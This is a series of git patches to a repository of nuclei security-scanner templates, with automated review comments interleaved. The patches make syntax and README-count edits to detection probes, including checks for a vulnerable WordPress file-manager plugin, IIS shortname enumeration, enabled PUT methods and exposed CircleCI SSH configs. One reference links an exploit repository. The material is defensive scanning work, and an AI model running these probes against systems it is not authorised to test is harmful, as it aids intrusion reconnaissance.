diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index 9cc0ee8f57..fbd3425453 100644 --- a/cves/2020/CVE-2020-25213.yaml +++ b/cves/2020/CVE-2020-25213.yaml @@ -1,11 +1,13 @@ -id: CVE-2020–25213 +id: CVE-2020-25213 info: name: WP File Manager RCE author: foulenzer severity: critical description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. - reference: https://nvd.nist.gov/vuln/detail/CVE-2020-25213 + reference: + - https://plugins.trac.wordpress.org/changeset/2373068 + - https://github.com/w4fz5uck5/wp-file-manager-0day tags: cve,cve2020,wordpress,rce # Uploaded file will be accessible at:- From 0b1e21dddb83ca2729d67f77f39e8d41e4bf0e1c Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 18:14:19 +0530 Subject: [PATCH 365/370] syntax update --- fuzzing/iis-shortname.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/fuzzing/iis-shortname.yaml b/fuzzing/iis-shortname.yaml index 1a2db42b20..3c3c4a7e28 100644 --- a/fuzzing/iis-shortname.yaml +++ b/fuzzing/iis-shortname.yaml @@ -46,8 +46,8 @@ requests: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 + req-condition: true matchers: - type: dsl - name: iis-scan dsl: - "status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404" From 2d2d253515090dc3969f166ee35d55160e5a3e8b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 18:32:26 +0530 Subject: [PATCH 366/370] removing empty spaces --- cves/2020/CVE-2020-25213.yaml | 2 +- cves/2020/CVE-2020-26214.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml index fbd3425453..987eee7315 100644 --- a/cves/2020/CVE-2020-25213.yaml 
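Review bot: With `req-condition: true` now gating the multi-request DSL, the expression it enables — the unchanged context line `"status_code_1!=404 && status_code_2 == 404 || status_code_3 != 404 && status_code_4 == 404"` — relies on `&&` binding tighter than `||` and mixes `!=404` with `!= 404`; writing it as `"(status_code_1 != 404 && status_code_2 == 404) || (status_code_3 != 404 && status_code_4 == 404)"` makes the intended pairing explicit without changing the result, assuming the DSL uses the usual precedence. Dropping `name: iis-scan` removes the matcher's name from the finding output; if anything downstream filtered on that name this is a visible change worth a sentence in the commit message. The request entry this hunk sits in starts above the hunk.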
+++ b/cves/2020/CVE-2020-25213.yaml @@ -5,7 +5,7 @@ info: author: foulenzer severity: critical description: The vulnerability allows unauthenticated remote attackers to upload .php files. This templates only detects the plugin, not its vulnerability. - reference: + reference: - https://plugins.trac.wordpress.org/changeset/2373068 - https://github.com/w4fz5uck5/wp-file-manager-0day tags: cve,cve2020,wordpress,rce diff --git a/cves/2020/CVE-2020-26214.yaml b/cves/2020/CVE-2020-26214.yaml index 2f43c8cf64..215918bce0 100644 --- a/cves/2020/CVE-2020-26214.yaml +++ b/cves/2020/CVE-2020-26214.yaml @@ -5,7 +5,7 @@ info: author: CasperGN severity: critical description: Alerta prior to version 8.1.0 is prone to Authentication Bypass when using LDAP as authorization provider and the LDAP server accepts Unauthenticated Bind reqests. - reference: + reference: - https://github.com/advisories/GHSA-5hmm-x8q8-w5jh - https://tools.ietf.org/html/rfc4513#section-5.1.2 - https://pypi.org/project/alerta-server/8.1.0/ From 01e25a5d1e1aa8070ae52e2be19cd7642ed24bfe Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 13:47:27 +0000 Subject: [PATCH 367/370] Auto Update README [Thu Mar 11 13:47:27 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 37d784efe8..b4ba60dc51 100644 --- a/README.md +++ b/README.md 
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 61 | technologies | 50 | misconfiguration | 54 | +| exposures | 62 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 712 files**. +**75 directories, 713 files**. From d3ee173adeeff3ab3cd6d5f483f01bd88ced3999 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 11 Mar 2021 19:47:22 +0530 Subject: [PATCH 368/370] Adding updated syntax --- cves/2019/CVE-2019-11869.yaml | 1 + exposed-panels/identityguard-selfservice-entrust.yaml | 1 + misconfiguration/put-method-enabled.yaml | 1 + 3 files changed, 3 insertions(+) diff --git a/cves/2019/CVE-2019-11869.yaml b/cves/2019/CVE-2019-11869.yaml index 27c0bf4a94..8a92db1344 100644 --- a/cves/2019/CVE-2019-11869.yaml +++ b/cves/2019/CVE-2019-11869.yaml @@ -33,6 +33,7 @@ requests: User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Upgrade-Insecure-Requests: 1 + req-condition: true matchers-condition: and matchers: - type: dsl diff --git a/exposed-panels/identityguard-selfservice-entrust.yaml b/exposed-panels/identityguard-selfservice-entrust.yaml index 771b21408a..a8cfb6d388 100644 --- a/exposed-panels/identityguard-selfservice-entrust.yaml +++ b/exposed-panels/identityguard-selfservice-entrust.yaml @@ -11,6 +11,7 @@ requests: - "{{BaseURL}}/IdentityGuardSelfService/" - "{{BaseURL}}/IdentityGuardSelfService/images/favicon.ico" + req-condition: true redirects: true max-redirects: 2 matchers: 
diff --git a/misconfiguration/put-method-enabled.yaml b/misconfiguration/put-method-enabled.yaml index 33f999e808..1e10bad487 100644 --- a/misconfiguration/put-method-enabled.yaml +++ b/misconfiguration/put-method-enabled.yaml @@ -19,6 +19,7 @@ requests: GET /testing-put.txt HTTP/1.1 Content-Type: text/plain + req-condition: true matchers: - type: dsl name: multi-req From ff4df95a5ee4a9e185aa413363dd47244cad9786 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 11 Mar 2021 14:29:16 +0000 Subject: [PATCH 369/370] Update circleci-ssh-config.yaml --- exposures/configs/circleci-ssh-config.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposures/configs/circleci-ssh-config.yaml b/exposures/configs/circleci-ssh-config.yaml index 59e81e5ea9..2d6eb7e18a 100644 --- a/exposures/configs/circleci-ssh-config.yaml +++ b/exposures/configs/circleci-ssh-config.yaml @@ -19,6 +19,7 @@ requests: - "Host" - "HostName" - "IdentityFile" + condition: and - type: status status: From b32604fe6dbdc7bd170a626ac968d3df06dfe792 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 11 Mar 2021 14:32:04 +0000 Subject: [PATCH 370/370] Auto Update README [Thu Mar 11 14:32:03 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index b4ba60dc51..d73c7cc75c 100644 --- a/README.md +++ b/README.md 
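Review bot: The `condition: and` added to the word matcher requires `"Host"`, `"HostName"` and `"IdentityFile"` together, but `"Host"` is a substring of `"HostName"` and is therefore satisfied whenever the second word is, so the conjunction effectively has two independent signals rather than three. A token that `HostName` cannot satisfy, such as `"Host "` with the trailing space (if the engine keeps it), would make the third term meaningful and cut false positives on pages that merely mention a hostname. The matcher's `part:` and the `matchers-condition:` for the file are above the hunk.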
@@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 235 | vulnerabilities | 105 | exposed-panels | 104 | -| exposures | 62 | technologies | 50 | misconfiguration | 54 | +| exposures | 63 | technologies | 50 | misconfiguration | 54 | | workflows | 23 | miscellaneous | 16 | default-logins | 19 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**75 directories, 713 files**. +**75 directories, 714 files**.